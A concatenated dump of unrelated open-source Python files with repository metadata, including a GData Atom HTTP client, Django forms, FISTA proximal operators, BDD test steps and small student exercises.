a881a9f8556f037ba6ea2123e9d8a596a0424231 | 37fdc797f0060a67c1e9318032bc7102d4fd9ecd | /untitled1/bin/pip3.7 | e52f46ac29013334a05a69eac759cb1d6ef18574 | [] | no_license | Change0224/PycharmProjects | 8fa3d23b399c5fb55661a79ca059f3da79847feb | 818ba4fd5dd8bcdaacae490ed106ffda868b6ca4 | refs/heads/master | 2021-02-06T15:37:16.653849 | 2020-03-03T14:30:44 | 2020-03-03T14:30:44 | 243,927,023 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | 7 | #!/Users/zhaojian/PycharmProjects/untitled1/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.7'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.7')()
)
| [
"lijj0224@163.com"
] | lijj0224@163.com |
c70840fd44de0cdfd339bb41f4681c5fb0b35748 | c4a119311ac01bbe7d5ab81b1d3d663ad0900ab6 | /python3-alpha/python-libs/atom/service.py | 246dd1b93419b5e808a842062b8b9a3ce615f379 | [
"Apache-2.0"
] | permissive | kuri65536/python-for-android | 1d8d99e81e64bc87805c2c58ee0dcf43d413e72e | 26402a08fc46b09ef94e8d7a6bbc3a54ff9d0891 | refs/heads/master | 2021-06-02T01:17:29.685199 | 2018-05-05T00:12:13 | 2018-05-05T01:36:22 | 32,235,625 | 280 | 122 | Apache-2.0 | 2020-05-15T06:47:36 | 2015-03-14T22:44:36 | Python | UTF-8 | Python | false | false | 28,950 | py | #!/usr/bin/python
#
# Copyright (C) 2006, 2007, 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""AtomService provides CRUD ops. in line with the Atom Publishing Protocol.
AtomService: Encapsulates the ability to perform insert, update and delete
operations with the Atom Publishing Protocol on which GData is
based. An instance can perform query, insertion, deletion, and
update.
HttpRequest: Function that performs a GET, POST, PUT, or DELETE HTTP request
to the specified end point. An AtomService object or a subclass can be
used to specify information about the request.
"""
__author__ = 'api.jscudder (Jeff Scudder)'
import atom.http_interface
import atom.url
import atom.http
import atom.token_store
import os
import http.client
import urllib.request, urllib.parse, urllib.error
import re
import base64
import socket
import warnings
try:
from xml.etree import cElementTree as ElementTree
except ImportError:
try:
import cElementTree as ElementTree
except ImportError:
try:
from xml.etree import ElementTree
except ImportError:
from elementtree import ElementTree
import atom
class AtomService(object):
"""Performs Atom Publishing Protocol CRUD operations.
The AtomService contains methods to perform HTTP CRUD operations.
"""
# Default values for members
port = 80
ssl = False
# Set the current_token to force the AtomService to use this token
# instead of searching for an appropriate token in the token_store.
current_token = None
auto_store_tokens = True
auto_set_current_token = True
def _get_override_token(self):
return self.current_token
def _set_override_token(self, token):
self.current_token = token
override_token = property(_get_override_token, _set_override_token)
#@atom.v1_deprecated('Please use atom.client.AtomPubClient instead.')
def __init__(self, server=None, additional_headers=None,
application_name='', http_client=None, token_store=None):
"""Creates a new AtomService client.
Args:
server: string (optional) The start of a URL for the server
to which all operations should be directed. Example:
'www.google.com'
additional_headers: dict (optional) Any additional HTTP headers which
should be included with CRUD operations.
http_client: An object responsible for making HTTP requests using a
request method. If none is provided, a new instance of
atom.http.ProxiedHttpClient will be used.
token_store: Keeps a collection of authorization tokens which can be
applied to requests for a specific URLs. Critical methods are
find_token based on a URL (atom.url.Url or a string), add_token,
and remove_token.
"""
self.http_client = http_client or atom.http.ProxiedHttpClient()
self.token_store = token_store or atom.token_store.TokenStore()
self.server = server
self.additional_headers = additional_headers or {}
self.additional_headers['User-Agent'] = atom.http_interface.USER_AGENT % (
application_name,)
# If debug is True, the HTTPConnection will display debug information
self._set_debug(False)
__init__ = atom.v1_deprecated(
'Please use atom.client.AtomPubClient instead.')(
__init__)
def _get_debug(self):
return self.http_client.debug
def _set_debug(self, value):
self.http_client.debug = value
debug = property(_get_debug, _set_debug,
doc='If True, HTTP debug information is printed.')
def use_basic_auth(self, username, password, scopes=None):
if username is not None and password is not None:
if scopes is None:
scopes = [atom.token_store.SCOPE_ALL]
base_64_string = base64.encodestring('%s:%s' % (username, password))
token = BasicAuthToken('Basic %s' % base_64_string.strip(),
scopes=[atom.token_store.SCOPE_ALL])
if self.auto_set_current_token:
self.current_token = token
if self.auto_store_tokens:
return self.token_store.add_token(token)
return True
return False
def UseBasicAuth(self, username, password, for_proxy=False):
"""Sets an Authenticaiton: Basic HTTP header containing plaintext.
Deprecated, use use_basic_auth instead.
The username and password are base64 encoded and added to an HTTP header
which will be included in each request. Note that your username and
password are sent in plaintext.
Args:
username: str
password: str
"""
self.use_basic_auth(username, password)
#@atom.v1_deprecated('Please use atom.client.AtomPubClient for requests.')
def request(self, operation, url, data=None, headers=None,
url_params=None):
if isinstance(url, str):
if url.startswith('http:') and self.ssl:
# Force all requests to be https if self.ssl is True.
url = atom.url.parse_url('https:' + url[5:])
elif not url.startswith('http') and self.ssl:
url = atom.url.parse_url('https://%s%s' % (self.server, url))
elif not url.startswith('http'):
url = atom.url.parse_url('http://%s%s' % (self.server, url))
else:
url = atom.url.parse_url(url)
if url_params:
for name, value in url_params.items():
url.params[name] = value
all_headers = self.additional_headers.copy()
if headers:
all_headers.update(headers)
# If the list of headers does not include a Content-Length, attempt to
# calculate it based on the data object.
if data and 'Content-Length' not in all_headers:
content_length = CalculateDataLength(data)
if content_length:
all_headers['Content-Length'] = str(content_length)
# Find an Authorization token for this URL if one is available.
if self.override_token:
auth_token = self.override_token
else:
auth_token = self.token_store.find_token(url)
return auth_token.perform_request(self.http_client, operation, url,
data=data, headers=all_headers)
request = atom.v1_deprecated(
'Please use atom.client.AtomPubClient for requests.')(
request)
# CRUD operations
def Get(self, uri, extra_headers=None, url_params=None, escape_params=True):
"""Query the APP server with the given URI
The uri is the portion of the URI after the server value
(server example: 'www.google.com').
Example use:
To perform a query against Google Base, set the server to
'base.google.com' and set the uri to '/base/feeds/...', where ... is
your query. For example, to find snippets for all digital cameras uri
should be set to: '/base/feeds/snippets?bq=digital+camera'
Args:
uri: string The query in the form of a URI. Example:
'/base/feeds/snippets?bq=digital+camera'.
extra_headers: dicty (optional) Extra HTTP headers to be included
in the GET request. These headers are in addition to
those stored in the client's additional_headers property.
The client automatically sets the Content-Type and
Authorization headers.
url_params: dict (optional) Additional URL parameters to be included
in the query. These are translated into query arguments
in the form '&dict_key=value&...'.
Example: {'max-results': '250'} becomes &max-results=250
escape_params: boolean (optional) If false, the calling code has already
ensured that the query will form a valid URL (all
reserved characters have been escaped). If true, this
method will escape the query and any URL parameters
provided.
Returns:
httplib.HTTPResponse The server's response to the GET request.
"""
return self.request('GET', uri, data=None, headers=extra_headers,
url_params=url_params)
def Post(self, data, uri, extra_headers=None, url_params=None,
escape_params=True, content_type='application/atom+xml'):
"""Insert data into an APP server at the given URI.
Args:
data: string, ElementTree._Element, or something with a __str__ method
The XML to be sent to the uri.
uri: string The location (feed) to which the data should be inserted.
Example: '/base/feeds/items'.
extra_headers: dict (optional) HTTP headers which are to be included.
The client automatically sets the Content-Type,
Authorization, and Content-Length headers.
url_params: dict (optional) Additional URL parameters to be included
in the URI. These are translated into query arguments
in the form '&dict_key=value&...'.
Example: {'max-results': '250'} becomes &max-results=250
escape_params: boolean (optional) If false, the calling code has already
ensured that the query will form a valid URL (all
reserved characters have been escaped). If true, this
method will escape the query and any URL parameters
provided.
Returns:
httplib.HTTPResponse Server's response to the POST request.
"""
if extra_headers is None:
extra_headers = {}
if content_type:
extra_headers['Content-Type'] = content_type
return self.request('POST', uri, data=data, headers=extra_headers,
url_params=url_params)
def Put(self, data, uri, extra_headers=None, url_params=None,
escape_params=True, content_type='application/atom+xml'):
"""Updates an entry at the given URI.
Args:
data: string, ElementTree._Element, or xml_wrapper.ElementWrapper The
XML containing the updated data.
uri: string A URI indicating entry to which the update will be applied.
Example: '/base/feeds/items/ITEM-ID'
extra_headers: dict (optional) HTTP headers which are to be included.
The client automatically sets the Content-Type,
Authorization, and Content-Length headers.
url_params: dict (optional) Additional URL parameters to be included
in the URI. These are translated into query arguments
in the form '&dict_key=value&...'.
Example: {'max-results': '250'} becomes &max-results=250
escape_params: boolean (optional) If false, the calling code has already
ensured that the query will form a valid URL (all
reserved characters have been escaped). If true, this
method will escape the query and any URL parameters
provided.
Returns:
httplib.HTTPResponse Server's response to the PUT request.
"""
if extra_headers is None:
extra_headers = {}
if content_type:
extra_headers['Content-Type'] = content_type
return self.request('PUT', uri, data=data, headers=extra_headers,
url_params=url_params)
def Delete(self, uri, extra_headers=None, url_params=None,
escape_params=True):
"""Deletes the entry at the given URI.
Args:
uri: string The URI of the entry to be deleted. Example:
'/base/feeds/items/ITEM-ID'
extra_headers: dict (optional) HTTP headers which are to be included.
The client automatically sets the Content-Type and
Authorization headers.
url_params: dict (optional) Additional URL parameters to be included
in the URI. These are translated into query arguments
in the form '&dict_key=value&...'.
Example: {'max-results': '250'} becomes &max-results=250
escape_params: boolean (optional) If false, the calling code has already
ensured that the query will form a valid URL (all
reserved characters have been escaped). If true, this
method will escape the query and any URL parameters
provided.
Returns:
httplib.HTTPResponse Server's response to the DELETE request.
"""
return self.request('DELETE', uri, data=None, headers=extra_headers,
url_params=url_params)
class BasicAuthToken(atom.http_interface.GenericToken):
def __init__(self, auth_header, scopes=None):
"""Creates a token used to add Basic Auth headers to HTTP requests.
Args:
auth_header: str The value for the Authorization header.
scopes: list of str or atom.url.Url specifying the beginnings of URLs
for which this token can be used. For example, if scopes contains
'http://example.com/foo', then this token can be used for a request to
'http://example.com/foo/bar' but it cannot be used for a request to
'http://example.com/baz'
"""
self.auth_header = auth_header
self.scopes = scopes or []
def perform_request(self, http_client, operation, url, data=None,
headers=None):
"""Sets the Authorization header to the basic auth string."""
if headers is None:
headers = {'Authorization':self.auth_header}
else:
headers['Authorization'] = self.auth_header
return http_client.request(operation, url, data=data, headers=headers)
def __str__(self):
return self.auth_header
def valid_for_scope(self, url):
"""Tells the caller if the token authorizes access to the desired URL.
"""
if isinstance(url, str):
url = atom.url.parse_url(url)
for scope in self.scopes:
if scope == atom.token_store.SCOPE_ALL:
return True
if isinstance(scope, str):
scope = atom.url.parse_url(scope)
if scope == url:
return True
# Check the host and the path, but ignore the port and protocol.
elif scope.host == url.host and not scope.path:
return True
elif scope.host == url.host and scope.path and not url.path:
continue
elif scope.host == url.host and url.path.startswith(scope.path):
return True
return False
def PrepareConnection(service, full_uri):
"""Opens a connection to the server based on the full URI.
This method is deprecated, instead use atom.http.HttpClient.request.
Examines the target URI and the proxy settings, which are set as
environment variables, to open a connection with the server. This
connection is used to make an HTTP request.
Args:
service: atom.AtomService or a subclass. It must have a server string which
represents the server host to which the request should be made. It may also
have a dictionary of additional_headers to send in the HTTP request.
full_uri: str Which is the target relative (lacks protocol and host) or
absolute URL to be opened. Example:
'https://www.google.com/accounts/ClientLogin' or
'base/feeds/snippets' where the server is set to www.google.com.
Returns:
A tuple containing the httplib.HTTPConnection and the full_uri for the
request.
"""
deprecation('calling deprecated function PrepareConnection')
(server, port, ssl, partial_uri) = ProcessUrl(service, full_uri)
if ssl:
# destination is https
proxy = os.environ.get('https_proxy')
if proxy:
(p_server, p_port, p_ssl, p_uri) = ProcessUrl(service, proxy, True)
proxy_username = os.environ.get('proxy-username')
if not proxy_username:
proxy_username = os.environ.get('proxy_username')
proxy_password = os.environ.get('proxy-password')
if not proxy_password:
proxy_password = os.environ.get('proxy_password')
if proxy_username:
user_auth = base64.encodestring('%s:%s' % (proxy_username,
proxy_password))
proxy_authorization = ('Proxy-authorization: Basic %s\r\n' % (
user_auth.strip()))
else:
proxy_authorization = ''
proxy_connect = 'CONNECT %s:%s HTTP/1.0\r\n' % (server, port)
user_agent = 'User-Agent: %s\r\n' % (
service.additional_headers['User-Agent'])
proxy_pieces = (proxy_connect + proxy_authorization + user_agent
+ '\r\n')
#now connect, very simple recv and error checking
p_sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
p_sock.connect((p_server,p_port))
p_sock.sendall(proxy_pieces)
response = ''
# Wait for the full response.
while response.find("\r\n\r\n") == -1:
response += p_sock.recv(8192)
p_status=response.split()[1]
if p_status!=str(200):
raise atom.http.ProxyError('Error status=%s' % p_status)
# Trivial setup for ssl socket.
ssl = socket.ssl(p_sock, None, None)
fake_sock = http.client.FakeSocket(p_sock, ssl)
# Initalize httplib and replace with the proxy socket.
connection = http.client.HTTPConnection(server)
connection.sock=fake_sock
full_uri = partial_uri
else:
connection = http.client.HTTPSConnection(server, port)
full_uri = partial_uri
else:
# destination is http
proxy = os.environ.get('http_proxy')
if proxy:
(p_server, p_port, p_ssl, p_uri) = ProcessUrl(service.server, proxy, True)
proxy_username = os.environ.get('proxy-username')
if not proxy_username:
proxy_username = os.environ.get('proxy_username')
proxy_password = os.environ.get('proxy-password')
if not proxy_password:
proxy_password = os.environ.get('proxy_password')
if proxy_username:
UseBasicAuth(service, proxy_username, proxy_password, True)
connection = http.client.HTTPConnection(p_server, p_port)
if not full_uri.startswith("http://"):
if full_uri.startswith("/"):
full_uri = "http://%s%s" % (service.server, full_uri)
else:
full_uri = "http://%s/%s" % (service.server, full_uri)
else:
connection = http.client.HTTPConnection(server, port)
full_uri = partial_uri
return (connection, full_uri)
def UseBasicAuth(service, username, password, for_proxy=False):
"""Sets an Authenticaiton: Basic HTTP header containing plaintext.
Deprecated, use AtomService.use_basic_auth insread.
The username and password are base64 encoded and added to an HTTP header
which will be included in each request. Note that your username and
password are sent in plaintext. The auth header is added to the
additional_headers dictionary in the service object.
Args:
service: atom.AtomService or a subclass which has an
additional_headers dict as a member.
username: str
password: str
"""
deprecation('calling deprecated function UseBasicAuth')
base_64_string = base64.encodestring('%s:%s' % (username, password))
base_64_string = base_64_string.strip()
if for_proxy:
header_name = 'Proxy-Authorization'
else:
header_name = 'Authorization'
service.additional_headers[header_name] = 'Basic %s' % (base_64_string,)
def ProcessUrl(service, url, for_proxy=False):
"""Processes a passed URL. If the URL does not begin with https?, then
the default value for server is used
This method is deprecated, use atom.url.parse_url instead.
"""
if not isinstance(url, atom.url.Url):
url = atom.url.parse_url(url)
server = url.host
ssl = False
port = 80
if not server:
if hasattr(service, 'server'):
server = service.server
else:
server = service
if not url.protocol and hasattr(service, 'ssl'):
ssl = service.ssl
if hasattr(service, 'port'):
port = service.port
else:
if url.protocol == 'https':
ssl = True
elif url.protocol == 'http':
ssl = False
if url.port:
port = int(url.port)
elif port == 80 and ssl:
port = 443
return (server, port, ssl, url.get_request_uri())
def DictionaryToParamList(url_parameters, escape_params=True):
"""Convert a dictionary of URL arguments into a URL parameter string.
This function is deprcated, use atom.url.Url instead.
Args:
url_parameters: The dictionaty of key-value pairs which will be converted
into URL parameters. For example,
{'dry-run': 'true', 'foo': 'bar'}
will become ['dry-run=true', 'foo=bar'].
Returns:
A list which contains a string for each key-value pair. The strings are
ready to be incorporated into a URL by using '&'.join([] + parameter_list)
"""
# Choose which function to use when modifying the query and parameters.
# Use quote_plus when escape_params is true.
transform_op = [str, urllib.parse.quote_plus][bool(escape_params)]
# Create a list of tuples containing the escaped version of the
# parameter-value pairs.
parameter_tuples = [(transform_op(param), transform_op(value))
for param, value in list((url_parameters or {}).items())]
# Turn parameter-value tuples into a list of strings in the form
# 'PARAMETER=VALUE'.
return ['='.join(x) for x in parameter_tuples]
def BuildUri(uri, url_params=None, escape_params=True):
"""Converts a uri string and a collection of parameters into a URI.
This function is deprcated, use atom.url.Url instead.
Args:
uri: string
url_params: dict (optional)
escape_params: boolean (optional)
uri: string The start of the desired URI. This string can alrady contain
URL parameters. Examples: '/base/feeds/snippets',
'/base/feeds/snippets?bq=digital+camera'
url_parameters: dict (optional) Additional URL parameters to be included
in the query. These are translated into query arguments
in the form '&dict_key=value&...'.
Example: {'max-results': '250'} becomes &max-results=250
escape_params: boolean (optional) If false, the calling code has already
ensured that the query will form a valid URL (all
reserved characters have been escaped). If true, this
method will escape the query and any URL parameters
provided.
Returns:
string The URI consisting of the escaped URL parameters appended to the
initial uri string.
"""
# Prepare URL parameters for inclusion into the GET request.
parameter_list = DictionaryToParamList(url_params, escape_params)
# Append the URL parameters to the URL.
if parameter_list:
if uri.find('?') != -1:
# If there are already URL parameters in the uri string, add the
# parameters after a new & character.
full_uri = '&'.join([uri] + parameter_list)
else:
# The uri string did not have any URL parameters (no ? character)
# so put a ? between the uri and URL parameters.
full_uri = '%s%s' % (uri, '?%s' % ('&'.join([] + parameter_list)))
else:
full_uri = uri
return full_uri
def HttpRequest(service, operation, data, uri, extra_headers=None,
url_params=None, escape_params=True, content_type='application/atom+xml'):
"""Performs an HTTP call to the server, supports GET, POST, PUT, and DELETE.
This method is deprecated, use atom.http.HttpClient.request instead.
Usage example, perform and HTTP GET on http://www.google.com/:
import atom.service
client = atom.service.AtomService()
http_response = client.Get('http://www.google.com/')
or you could set the client.server to 'www.google.com' and use the
following:
client.server = 'www.google.com'
http_response = client.Get('/')
Args:
service: atom.AtomService object which contains some of the parameters
needed to make the request. The following members are used to
construct the HTTP call: server (str), additional_headers (dict),
port (int), and ssl (bool).
operation: str The HTTP operation to be performed. This is usually one of
'GET', 'POST', 'PUT', or 'DELETE'
data: ElementTree, filestream, list of parts, or other object which can be
converted to a string.
Should be set to None when performing a GET or PUT.
If data is a file-like object which can be read, this method will read
a chunk of 100K bytes at a time and send them.
If the data is a list of parts to be sent, each part will be evaluated
and sent.
uri: The beginning of the URL to which the request should be sent.
Examples: '/', '/base/feeds/snippets',
'/m8/feeds/contacts/default/base'
extra_headers: dict of strings. HTTP headers which should be sent
in the request. These headers are in addition to those stored in
service.additional_headers.
url_params: dict of strings. Key value pairs to be added to the URL as
URL parameters. For example {'foo':'bar', 'test':'param'} will
become ?foo=bar&test=param.
escape_params: bool default True. If true, the keys and values in
url_params will be URL escaped when the form is constructed
(Special characters converted to %XX form.)
content_type: str The MIME type for the data being sent. Defaults to
'application/atom+xml', this is only used if data is set.
"""
deprecation('call to deprecated function HttpRequest')
full_uri = BuildUri(uri, url_params, escape_params)
(connection, full_uri) = PrepareConnection(service, full_uri)
if extra_headers is None:
extra_headers = {}
# Turn on debug mode if the debug member is set.
if service.debug:
connection.debuglevel = 1
connection.putrequest(operation, full_uri)
# If the list of headers does not include a Content-Length, attempt to
# calculate it based on the data object.
if (data and 'Content-Length' not in service.additional_headers and
'Content-Length' not in extra_headers):
content_length = CalculateDataLength(data)
if content_length:
extra_headers['Content-Length'] = str(content_length)
if content_type:
extra_headers['Content-Type'] = content_type
# Send the HTTP headers.
if isinstance(service.additional_headers, dict):
for header in service.additional_headers:
connection.putheader(header, service.additional_headers[header])
if isinstance(extra_headers, dict):
for header in extra_headers:
connection.putheader(header, extra_headers[header])
connection.endheaders()
# If there is data, send it in the request.
if data:
if isinstance(data, list):
for data_part in data:
__SendDataPart(data_part, connection)
else:
__SendDataPart(data, connection)
# Return the HTTP Response from the server.
return connection.getresponse()
def __SendDataPart(data, connection):
"""This method is deprecated, use atom.http._send_data_part"""
deprecated('call to deprecated function __SendDataPart')
if isinstance(data, str):
#TODO add handling for unicode.
connection.send(data)
return
elif ElementTree.iselement(data):
connection.send(ElementTree.tostring(data))
return
# Check to see if data is a file-like object that has a read method.
elif hasattr(data, 'read'):
# Read the file and send it a chunk at a time.
while 1:
binarydata = data.read(100000)
if binarydata == '': break
connection.send(binarydata)
return
else:
# The data object was not a file.
# Try to convert to a string and send the data.
connection.send(str(data))
return
def CalculateDataLength(data):
"""Attempts to determine the length of the data to send.
This method will respond with a length only if the data is a string or
and ElementTree element.
Args:
data: object If this is not a string or ElementTree element this funtion
will return None.
"""
if isinstance(data, str):
return len(data)
elif isinstance(data, list):
return None
elif ElementTree.iselement(data):
return len(ElementTree.tostring(data))
elif hasattr(data, 'read'):
# If this is a file-like object, don't try to guess the length.
return None
else:
return len(str(data))
def deprecation(message):
warnings.warn(message, DeprecationWarning, stacklevel=2)
| [
"rjmatthews62@gmail.com"
] | rjmatthews62@gmail.com |
95b961d36c5737ee91cf28899c9db819935a2260 | 8db6b0404f179332e900c09bdb7acbc0779dc250 | /reinforcement_learning/0x00-q_learning/0-load_env.py | 113d10d342b3a1e2dabb244ba52a86677f8b7607 | [] | no_license | chriswill88/holbertonschool-machine_learning | 6f1f900a0e5da013608b4be3e60af15872dc1f99 | 05eabebe5e5c050b1c4a7e1454b947638d883176 | refs/heads/master | 2022-12-30T08:35:50.216909 | 2020-10-18T23:10:23 | 2020-10-18T23:10:23 | 255,544,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | #!/usr/bin/env python3
"""this module contains a function for task 0"""
import gym
def load_frozen_lake(desc=None, map_name=None, is_slippery=False):
"""creates the frozen lake enviroment"""
env = gym.make(
'FrozenLake-v0', desc=desc, map_name=map_name, is_slippery=is_slippery)
return env
| [
"williechri79@gmail.com"
] | williechri79@gmail.com |
d9a98e0727826a2e9368331ebbee230d42859401 | c6da4e00eb27ff33becd0b2f7e962b5cc43f9b20 | /proximal.py | ef75b6639a3640ce62538b70545bdfd4dc29a26f | [] | no_license | cyber-meow/FISTA | 93c61653e55e9b02eb5659cc8e60f17da7f8bb71 | c85d5364083ab69f1476b225f6b71713ac4c02dd | refs/heads/master | 2020-04-13T21:15:55.119870 | 2019-01-02T17:09:36 | 2019-01-02T17:09:36 | 163,451,363 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,417 | py | import numpy as np
import torch
import pywt
def soft_thresholding(x, th):
return np.sign(x) * np.maximum(np.abs(x)-th, 0)
class SoftThresholding(object):
def __init__(self, lamb):
self.lamb = lamb
def __call__(self, x, gamma):
th = self.lamb * gamma
device = 'cuda' if x.is_cuda else 'cpu'
x = soft_thresholding(x.cpu().detach().numpy(), th)
x = torch.tensor(x, dtype=torch.float, requires_grad=True).to(device)
return x
class WaveletST(object):
def __init__(self, lamb, wavelet='db4'):
self.lamb = lamb
self.wavelet = wavelet
def __call__(self, x, gamma):
th = self.lamb * gamma
device = 'cuda' if x.is_cuda else 'cpu'
x_wav = pywt.wavedec2(x.cpu().detach().numpy(), self.wavelet)
x_wav[0] = soft_thresholding(x_wav[0], th)
for i, coeffs in enumerate(x_wav[1:]):
cH = soft_thresholding(coeffs[0], th)
cV = soft_thresholding(coeffs[1], th)
cD = soft_thresholding(coeffs[2], th)
x_wav[i+1] = cH, cV, cD
x = pywt.waverec2(x_wav, self.wavelet)
return torch.tensor(
x, dtype=torch.float,
requires_grad=True).to(device)
class ProjectInf(object):
def __init__(self, lamb):
self.lamb = lamb
def __call__(self, x, gamma):
return torch.clamp(x, -self.lamb, self.lamb)
| [
"sjungle305@gmail.com"
] | sjungle305@gmail.com |
617a6254379110f96f106c107563e54e1020e433 | 4fdab62336c7b4bde236351fabdd79cdec0b3d20 | /post_questions/forms.py | 4c4c245e3a02abe390e3f312eabf270eee9106b9 | [] | no_license | aashiqms/ask_new | 8e6f76fbe41da68d32967c5ab3a14a76d469f50d | 7f7a5e1b5e9b498030415607b8419e90147cd597 | refs/heads/master | 2022-07-04T21:51:56.107360 | 2020-05-17T18:03:19 | 2020-05-17T18:03:19 | 264,604,874 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 782 | py | from django import forms
from post_questions.models import Post, Comment, Answer
from django.forms import ModelForm
class QuestionForm(ModelForm):
class Meta:
model = Post
fields = ['author', 'questions']
# widget = {
# 'title': forms.TextInput(attrs={'class': 'textinputclass'}),
# }
class CommentForm(ModelForm):
class Meta:
model = Comment
fields = ['author', 'text']
# widget = {
# 'title': forms.TextInput(attrs={'class': 'textinputclass'}),
# }
class AnswerForm(ModelForm):
class Meta:
model = Answer
fields = ['author', 'text']
# widget = {
# 'title': forms.TextInput(attrs={'class': 'textinputclass'}),
# }
form = QuestionForm()
form_A = AnswerForm()
| [
"aashiqms@outlook.com"
] | aashiqms@outlook.com |
c49b0c124c8eeb7a4917b06d1acffade30e7bf1f | 72df811521e3da73187388c737599ddd0a4631fc | /START_PYTHON/4日/11.バンボクムンwhile/03.while.py | 4bc0180ed23f1f2e825dba7d5922b98565f5a4a0 | [] | no_license | munsangu/20190615python | e7480044cfa07dcb65e8ca168c7cf9ecb73ffe7a | c496bc471503ac0e2ba0d928c01085c8b569d173 | refs/heads/master | 2020-06-04T14:59:49.822865 | 2020-02-08T11:49:16 | 2020-02-08T11:49:16 | 192,071,616 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | # 내가 원하는 만큼 입력받고 그 숫자의 평균을 구하는 프로그램
num = 1
count = 0
sum = 0
while num !=0: #num이 0이 아니면 반복
num = int(input("정수 입력: "))
count += 1 # 몇 번 입력받았는지 count
sum += num
count -= 1 # 0을 입력한 count 하나 제외
avg = sum / count
print("평균 : %.2f"%avg)
| [
"ds-3632@hanmail.net"
] | ds-3632@hanmail.net |
50a7fad07fc0b5935c80ee5dfac6b9b8555e9a9d | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_1/swnrei001/question3.py | 4e473093a1d821898c258c5628e999860a896c5f | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 872 | py | def spam():
firstname = input("Enter first name:\n")
lastname = input("Enter last name:\n")
money = eval(input("Enter sum of money in USD:\n"))
country = input("Enter country name:\n")
letter = """Dearest """ + firstname + """\nIt is with a heavy heart that I inform you of the death of my father,
General Fayk """ + lastname + """, your long lost relative from Mapsfostol.
My father left the sum of """ + str(money) + """USD for us, your distant cousins.
Unfortunately, we cannot access the money as it is in a bank in """ + country + """.
I desperately need your assistance to access this money.
I will even pay you generously, 30% of the amount - """ + str(money * 0.3) + """USD,
for your help. Please get in touch with me at this email address asap.
Yours sincerely
Frank """ + lastname
print()
print(letter)
spam() | [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
e7371d1f3476d8e3b2d7580d5f8194845330d249 | b66c12a4304c6af00d58a1f83e453dbc739ae60d | /survey/features/about_us_steps.py | 3d0b8c9390b1acfe7127b065e4d6a78de8c6afde | [
"BSD-2-Clause"
] | permissive | madhavaramu/uSurvey | 060dae008f975a7cdb77ef8b0c5d820842422637 | 681e1d91fbedf94e840858e1ef09538777ce3e50 | refs/heads/uSurvey | 2020-04-11T06:28:17.220192 | 2016-12-06T13:24:45 | 2016-12-06T13:24:45 | 68,372,980 | 0 | 1 | null | 2016-09-16T11:03:44 | 2016-09-16T11:03:43 | null | UTF-8 | Python | false | false | 1,563 | py | from lettuce import *
from survey.features.page_objects.root import AboutPage, EditAboutUsPage
from survey.models import AboutUs
@step(u'And I visit the about us page')
def and_i_visit_the_about_us_page(step):
world.page = AboutPage(world.browser)
world.page.visit()
@step(u'And I have about us content')
def and_i_have_about_us_content(step):
world.about_us = AboutUs.objects.create(content="blah blah")
@step(u'Then I should see the sample about us information')
def then_i_should_see_the_sample_about_us_information(step):
world.page.is_text_present(world.about_us.content)
@step(u'When I click the edit link')
def when_i_click_the_edit_link(step):
world.page.click_by_css("#edit-about_us")
@step(u'Then I should see the existing content in a text area')
def then_i_should_see_the_existing_content_in_a_text_area(step):
world.page = EditAboutUsPage(world.browser)
world.form_data = {'content': world.about_us.content}
world.page.validate_form_values(world.form_data)
@step(u'When I modify about us content')
def when_i_modify_about_us_content(step):
world.form_data = {'content': "edited more blah blah blah"}
world.page.fill_wywget_textarea(world.form_data)
@step(u'Then I should see the content was updated successfully')
def then_i_should_see_the_content_was_updated_successfully(step):
world.page.see_success_message("About us content", "updated")
@step(u'And I should not see the edit about us button')
def and_i_should_not_see_the_edit_about_us_button(step):
world.page.assert_edit_link_absent() | [
"antsmc2@yahoo.com"
] | antsmc2@yahoo.com |
290920be930c40942829f4f4ddb96f55ae5fd5a5 | ca1c2630b517c2dd69ecb2741174c5147feea638 | /mercury/null_byte_filter.py | 1f5f05e6f372805662128a1c6598ba31b362b23f | [] | no_license | dexter-taylor/mercury | 708cf0440016d05e8c3754e82471d8b6e2ab5589 | efb02177ac12747d65aba43b47541d548fd5bdeb | refs/heads/master | 2020-04-18T14:25:43.808775 | 2019-01-25T06:59:08 | 2019-01-25T06:59:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,465 | py | #!/usr/bin/env python
'''Usage:
null_byte_filter.py (-n | -d | -l) <datafile>
Options:
-n --null Retrieve the line numbers of the lines with null bytes ('\0') and the first field in that line containing a null byte
-d --readable_dict Retrieve the lines that can be read by a csv reader (do not contain null bytes) and return lines as dictionaries
-l --readable_line Retrieve readable lines and just return line
'''
import docopt
import datamap as dmap
from snap import common
from xcsv import Dictionary2CSVProcessor
def main(args):
src_file = args.get('<datafile>')
null_mode = args.get('--null')
readable_dict_mode = args.get('--readable_dict')
readable_line_mode = args.get('--readable_line')
with open(src_file) as f:
first_line = f.readline()
fields = first_line.split('|')
nb_reporter = dmap.NullByteFilter(delimiter='|', field_names=fields)
if null_mode:
null_pairs = nb_reporter.filter_with_null_output(src_file)
for null_pair in null_pairs:
